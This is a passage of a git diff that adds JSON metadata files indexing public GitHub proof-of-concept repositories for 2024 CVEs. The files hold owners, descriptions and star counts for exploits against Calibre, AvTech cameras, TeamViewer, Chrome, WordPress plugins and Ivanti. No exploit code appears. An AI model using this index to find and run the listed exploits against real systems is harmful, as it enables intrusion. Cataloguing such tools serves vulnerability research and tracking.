"https:\/\/github.com\/12345qwert123456\/CVE-2024-6473-PoC", + "description": "Proof of concept (exploit) for CVE-2024-6473", + "fork": false, + "created_at": "2024-11-02T05:37:30Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-02T05:55:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "browser", + "cve", + "dll-hijacking", + "exploit", + "poc", + "yandex" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6529.json b/2024/CVE-2024-6529.json new file mode 100644 index 0000000000..6b8d407751 --- /dev/null +++ b/2024/CVE-2024-6529.json @@ -0,0 +1,33 @@ +[ + { + "id": 837367811, + "name": "CVE-2024-6529", + "full_name": "Abdurahmon3236\/CVE-2024-6529", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-6529", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:02:39Z", + "updated_at": "2024-08-02T20:03:11Z", + "pushed_at": "2024-08-02T20:03:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6536.json b/2024/CVE-2024-6536.json new file mode 100644 index 0000000000..e3d6157d3e --- /dev/null +++ b/2024/CVE-2024-6536.json @@ -0,0 +1,33 @@ +[ + { + "id": 836289886, + "name": "CVE-2024-6536", + "full_name": "apena-ba\/CVE-2024-6536", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-6536", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:31:56Z", + "updated_at": "2024-08-28T06:24:13Z", + "pushed_at": "2024-07-31T15:11:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6592.json b/2024/CVE-2024-6592.json new file mode 100644 index 0000000000..f1e064f682 --- /dev/null +++ b/2024/CVE-2024-6592.json @@ -0,0 +1,33 @@ +[ + { + "id": 858770133, + "name": "watchguard-sso-client", + "full_name": "RedTeamPentesting\/watchguard-sso-client", + "owner": { + "login": "RedTeamPentesting", + "id": 34096076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34096076?v=4", + "html_url": "https:\/\/github.com\/RedTeamPentesting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamPentesting\/watchguard-sso-client", + "description": "Client Implementation for the WatchGuard SSO Agent Protocol used for Security Research (CVE-2024-6592, CVE-2024-6593, CVE-2024-6594)", + "fork": false, + "created_at": "2024-09-17T14:01:10Z", + "updated_at": "2024-10-16T14:10:37Z", + "pushed_at": "2024-09-17T14:12:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6624.json b/2024/CVE-2024-6624.json new file mode 100644 index 0000000000..0cf7da58ae --- /dev/null +++ b/2024/CVE-2024-6624.json @@ -0,0 +1,36 @@ +[ + { + "id": 855156513, + "name": "CVE-2024-6624", + "full_name": "RandomRobbieBF\/CVE-2024-6624", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-6624", + "description": "JSON API User <= 3.9.3 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2024-09-10T12:08:55Z", + "updated_at": "2024-10-18T17:57:38Z", + "pushed_at": "2024-09-10T12:11:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "json-api-user", + "wordpress" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6670.json b/2024/CVE-2024-6670.json new file mode 100644 index 0000000000..a50e096f0b --- /dev/null +++ b/2024/CVE-2024-6670.json @@ -0,0 +1,33 @@ +[ + { + "id": 850000973, + "name": "CVE-2024-6670", + "full_name": "sinsinology\/CVE-2024-6670", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-6670", + "description": null, + "fork": false, + "created_at": "2024-08-30T17:13:14Z", + "updated_at": "2024-11-04T21:41:38Z", + "pushed_at": "2024-08-30T17:22:31Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 33, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6768.json b/2024/CVE-2024-6768.json new file mode 100644 index 0000000000..29bbf431e9 --- /dev/null +++ b/2024/CVE-2024-6768.json @@ -0,0 +1,33 @@ +[ + { + "id": 830402554, + "name": "CVE-2024-6768", + "full_name": "fortra\/CVE-2024-6768", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-6768", + "description": null, + "fork": false, + "created_at": "2024-07-18T07:52:46Z", + "updated_at": "2024-10-29T13:41:14Z", + "pushed_at": "2024-08-12T20:48:52Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6769.json b/2024/CVE-2024-6769.json new file mode 100644 index 0000000000..af0aa38181 --- /dev/null +++ b/2024/CVE-2024-6769.json @@ -0,0 +1,33 @@ +[ + { + "id": 849466467, + "name": "CVE-2024-6769", + "full_name": "fortra\/CVE-2024-6769", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-6769", + "description": "Activation cache poisoning to elevate from medium to high integrity (CVE-2024-6769)", + "fork": false, + "created_at": "2024-08-29T16:40:49Z", + "updated_at": "2024-11-24T14:19:49Z", + "pushed_at": "2024-09-29T21:58:19Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6778.json b/2024/CVE-2024-6778.json new file mode 100644 index 0000000000..31b5773135 --- /dev/null +++ b/2024/CVE-2024-6778.json @@ -0,0 +1,64 @@ +[ + { + "id": 855008152, + "name": "CVE-2024-6778-POC", + "full_name": "ading2210\/CVE-2024-6778-POC", + "owner": { + "login": "ading2210", + "id": 71154407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71154407?v=4", + "html_url": "https:\/\/github.com\/ading2210", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ading2210\/CVE-2024-6778-POC", + "description": "A POC exploit for CVE-2024-5836 and CVE-2024-6778, allowing for a sandbox escape from a Chrome extension. ", + "fork": false, + "created_at": "2024-09-10T06:27:59Z", + "updated_at": "2024-11-23T06:49:24Z", + "pushed_at": "2024-10-17T05:12:29Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 82, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 875609314, + "name": "POC-CVE-2024-6778", + "full_name": "r00tjunip3r1\/POC-CVE-2024-6778", + "owner": { + "login": "r00tjunip3r1", + "id": 185687343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185687343?v=4", + "html_url": "https:\/\/github.com\/r00tjunip3r1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tjunip3r1\/POC-CVE-2024-6778", + "description": null, + "fork": false, + "created_at": "2024-10-20T12:47:53Z", + "updated_at": "2024-10-22T21:30:49Z", + "pushed_at": "2024-10-20T12:50:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6782.json b/2024/CVE-2024-6782.json new file mode 100644 index 0000000000..1079caf996 --- /dev/null +++ b/2024/CVE-2024-6782.json @@ -0,0 +1,95 @@ +[ + { + "id": 838914336, + "name": "CVE-2024-6782", + "full_name": "zangjiahe\/CVE-2024-6782", + "owner": { + "login": "zangjiahe", + "id": 49680446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49680446?v=4", + "html_url": "https:\/\/github.com\/zangjiahe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zangjiahe\/CVE-2024-6782", + "description": "Calibre 远程代码执行(CVE-2024-6782)Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.", + "fork": false, + "created_at": "2024-08-06T15:31:48Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-06T15:35:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840181130, + "name": "CVE-2024-6782", + "full_name": "jdpsl\/CVE-2024-6782", + "owner": { + "login": "jdpsl", + "id": 8251941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8251941?v=4", + "html_url": "https:\/\/github.com\/jdpsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jdpsl\/CVE-2024-6782", + "description": "Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.", + "fork": false, + "created_at": "2024-08-09T06:25:03Z", + "updated_at": "2024-10-21T13:18:00Z", + "pushed_at": "2024-08-09T06:26:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857843697, + "name": "CVE-2024-6782-PoC", + "full_name": "0xB0y426\/CVE-2024-6782-PoC", + "owner": { + "login": "0xB0y426", + "id": 132174647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132174647?v=4", + "html_url": "https:\/\/github.com\/0xB0y426", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xB0y426\/CVE-2024-6782-PoC", + "description": "Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.", + "fork": false, + "created_at": "2024-09-15T18:45:44Z", + "updated_at": "2024-10-21T13:18:02Z", + "pushed_at": "2024-09-16T01:37:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7029.json b/2024/CVE-2024-7029.json new file mode 100644 index 0000000000..69541f36f4 --- /dev/null +++ b/2024/CVE-2024-7029.json @@ -0,0 +1,104 @@ +[ + { + "id": 849769018, + "name": "CVE-2024-7029-EXPLOIT", + "full_name": "bigherocenter\/CVE-2024-7029-EXPLOIT", + "owner": { + "login": "bigherocenter", + "id": 117562871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117562871?v=4", + "html_url": "https:\/\/github.com\/bigherocenter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigherocenter\/CVE-2024-7029-EXPLOIT", + "description": null, + "fork": false, + "created_at": "2024-08-30T07:58:27Z", + "updated_at": "2024-09-13T16:27:20Z", + "pushed_at": "2024-08-29T17:41:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 851043760, + "name": "CVE-2024-7029", + "full_name": "ebrasha\/CVE-2024-7029", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/CVE-2024-7029", + "description": "A PoC tool for exploiting CVE-2024-7029 in AvTech devices, enabling RCE, vulnerability scanning, and an interactive shell.", + "fork": false, + "created_at": "2024-09-02T10:16:49Z", + "updated_at": "2024-11-20T19:07:31Z", + "pushed_at": "2024-09-02T11:43:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": true, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal-security-group", + "avtech", + "cctv", + "cve-2024-7029", + "ebrasha", + "exploit", + "poc", + "remote-code-execution" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869446465, + "name": "CVE-2024-7029", + "full_name": "geniuszlyy\/CVE-2024-7029", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2024-7029", + "description": " A PoC exploit for the CVE-2024-7029 vulnerability found in AvTech devices, allowing Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-10-08T10:04:08Z", + "updated_at": "2024-11-04T03:04:59Z", + "pushed_at": "2024-10-08T10:08:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7094.json b/2024/CVE-2024-7094.json new file mode 100644 index 0000000000..21bce49027 --- /dev/null +++ b/2024/CVE-2024-7094.json @@ -0,0 +1,33 @@ +[ + { + "id": 844067541, + "name": "CVE-2024-7094", + "full_name": "nastar-id\/CVE-2024-7094", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2024-7094", + "description": "CVE-2024-7094 Vulnerability checker", + "fork": false, + "created_at": "2024-08-18T09:27:54Z", + "updated_at": "2024-08-21T10:19:13Z", + "pushed_at": "2024-08-21T10:19:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7120.json b/2024/CVE-2024-7120.json new file mode 100644 index 0000000000..73b4f493eb --- /dev/null +++ b/2024/CVE-2024-7120.json @@ -0,0 +1,33 @@ +[ + { + "id": 849964284, + "name": "CVE-2024-7120", + "full_name": "gh-ost00\/CVE-2024-7120", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7120", + "description": "⚠️⚠️ CVE-2024-7120 Command Injection Vulnerability in RAISECOM Gateway Devices", + "fork": false, + "created_at": "2024-08-30T15:50:50Z", + "updated_at": "2024-11-20T16:31:03Z", + "pushed_at": "2024-08-30T16:29:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7124.json b/2024/CVE-2024-7124.json new file mode 100644 index 0000000000..a8ad6360f4 --- /dev/null +++ b/2024/CVE-2024-7124.json @@ -0,0 +1,33 @@ +[ + { + "id": 888565008, + "name": "CVE-2024-7124", + "full_name": "kac89\/CVE-2024-7124", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-7124", + "description": "Improper Neutralization of Input During Web Page Generation vulnerability in DInGO dLibra software in the parameter 'filter' in the endpoint 'indexsearch' allows a Reflected Cross-Site Scripting (XSS). ", + "fork": false, + "created_at": "2024-11-14T16:05:44Z", + "updated_at": "2024-11-14T16:09:22Z", + "pushed_at": "2024-11-14T16:09:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7135.json b/2024/CVE-2024-7135.json new file mode 100644 index 0000000000..f8d0595d38 --- /dev/null +++ b/2024/CVE-2024-7135.json @@ -0,0 +1,33 @@ +[ + { + "id": 871140348, + "name": "CVE-2024-7135", + "full_name": "RandomRobbieBF\/CVE-2024-7135", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7135", + "description": "Tainacan <= 0.21.7 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Read", + "fork": false, + "created_at": "2024-10-11T10:56:59Z", + "updated_at": "2024-10-18T17:57:19Z", + "pushed_at": "2024-10-11T11:18:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7313.json b/2024/CVE-2024-7313.json new file mode 100644 index 0000000000..69bef79e98 --- /dev/null +++ b/2024/CVE-2024-7313.json @@ -0,0 +1,33 @@ +[ + { + "id": 843187042, + "name": "CVE-2024-7313", + "full_name": "Wayne-Ker\/CVE-2024-7313", + "owner": { + "login": "Wayne-Ker", + "id": 94828747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94828747?v=4", + "html_url": "https:\/\/github.com\/Wayne-Ker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wayne-Ker\/CVE-2024-7313", + "description": "Custom Proof-of-Concept on XSS to Unauthorized Admin Account Creation via WordPress Plugin Shield Security < 20.0.6", + "fork": false, + "created_at": "2024-08-16T01:01:57Z", + "updated_at": "2024-08-17T00:13:03Z", + "pushed_at": "2024-08-17T00:13:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7339.json b/2024/CVE-2024-7339.json new file mode 100644 index 0000000000..da5664516e --- /dev/null +++ b/2024/CVE-2024-7339.json @@ -0,0 +1,33 @@ +[ + { + "id": 838435771, + "name": "CVE-2024-7339", + "full_name": "RevoltSecurities\/CVE-2024-7339", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-7339", + "description": "An Vulnerability detection and Exploitation tool for CVE-2024-7339", + "fork": false, + "created_at": "2024-08-05T16:26:18Z", + "updated_at": "2024-11-19T03:01:34Z", + "pushed_at": "2024-08-10T17:38:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7456.json b/2024/CVE-2024-7456.json new file mode 100644 index 0000000000..ace706e343 --- /dev/null +++ b/2024/CVE-2024-7456.json @@ -0,0 +1,33 @@ +[ + { + "id": 882153324, + "name": "CVE-2024-7456scripts", + "full_name": "77Philly\/CVE-2024-7456scripts", + "owner": { + "login": "77Philly", + "id": 184293581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184293581?v=4", + "html_url": "https:\/\/github.com\/77Philly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/77Philly\/CVE-2024-7456scripts", + "description": null, + "fork": false, + "created_at": "2024-11-02T02:42:27Z", + "updated_at": "2024-11-02T02:58:40Z", + "pushed_at": "2024-11-02T02:58:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7479.json b/2024/CVE-2024-7479.json new file mode 100644 index 0000000000..85d0c4ccd2 --- /dev/null +++ b/2024/CVE-2024-7479.json @@ -0,0 +1,33 @@ +[ + { + "id": 864856964, + "name": "CVE-2024-7479_CVE-2024-7481", + "full_name": "PeterGabaldon\/CVE-2024-7479_CVE-2024-7481", + "owner": { + "login": "PeterGabaldon", + "id": 34518201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34518201?v=4", + "html_url": "https:\/\/github.com\/PeterGabaldon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterGabaldon\/CVE-2024-7479_CVE-2024-7481", + "description": "TeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.", + "fork": false, + "created_at": "2024-09-29T10:58:15Z", + "updated_at": "2024-11-18T18:21:07Z", + "pushed_at": "2024-10-04T09:39:09Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 120, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7514.json b/2024/CVE-2024-7514.json new file mode 100644 index 0000000000..3ab95566b8 --- /dev/null +++ b/2024/CVE-2024-7514.json @@ -0,0 +1,33 @@ +[ + { + "id": 871135091, + "name": "CVE-2024-7514", + "full_name": "RandomRobbieBF\/CVE-2024-7514", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7514", + "description": "WordPress Comments Import & Export <= 2.3.7 - Authenticated (Author+) Arbitrary File Read via Directory Traversal", + "fork": false, + "created_at": "2024-10-11T10:43:22Z", + "updated_at": "2024-10-18T17:57:22Z", + "pushed_at": "2024-10-11T10:45:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7593.json b/2024/CVE-2024-7593.json new file mode 100644 index 0000000000..caaf832321 --- /dev/null +++ b/2024/CVE-2024-7593.json @@ -0,0 +1,100 @@ +[ + { + "id": 848733673, + "name": "CVE-2024-7593", + "full_name": "rxerium\/CVE-2024-7593", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2024-7593", + "description": "Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.", + "fork": false, + "created_at": "2024-08-28T10:02:05Z", + "updated_at": "2024-10-05T06:17:08Z", + "pushed_at": "2024-10-05T06:17:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cyber-security", + "ivanti", + "nuclei" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862610561, + "name": "CVE-2024-7593_PoC_Exploit", + "full_name": "D3N14LD15K\/CVE-2024-7593_PoC_Exploit", + "owner": { + "login": "D3N14LD15K", + "id": 155617205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155617205?v=4", + "html_url": "https:\/\/github.com\/D3N14LD15K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3N14LD15K\/CVE-2024-7593_PoC_Exploit", + "description": "CVE-2024-7593 Ivanti Virtual Traffic Manager 22.2R1 \/ 22.7R2 Admin Panel Authentication Bypass PoC [EXPLOIT]", + "fork": false, + "created_at": "2024-09-24T22:24:35Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-09-24T23:28:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871449363, + "name": "CVE-2024-7593", + "full_name": "skyrowalker\/CVE-2024-7593", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-7593", + "description": null, + "fork": false, + "created_at": "2024-10-12T02:17:14Z", + "updated_at": "2024-10-12T02:17:42Z", + "pushed_at": "2024-10-12T02:17:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7646.json b/2024/CVE-2024-7646.json new file mode 100644 index 0000000000..6764be8559 --- /dev/null +++ b/2024/CVE-2024-7646.json @@ -0,0 +1,64 @@ +[ + { + "id": 849537237, + "name": "CVE-2024-7646", + "full_name": "r0binak\/CVE-2024-7646", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": 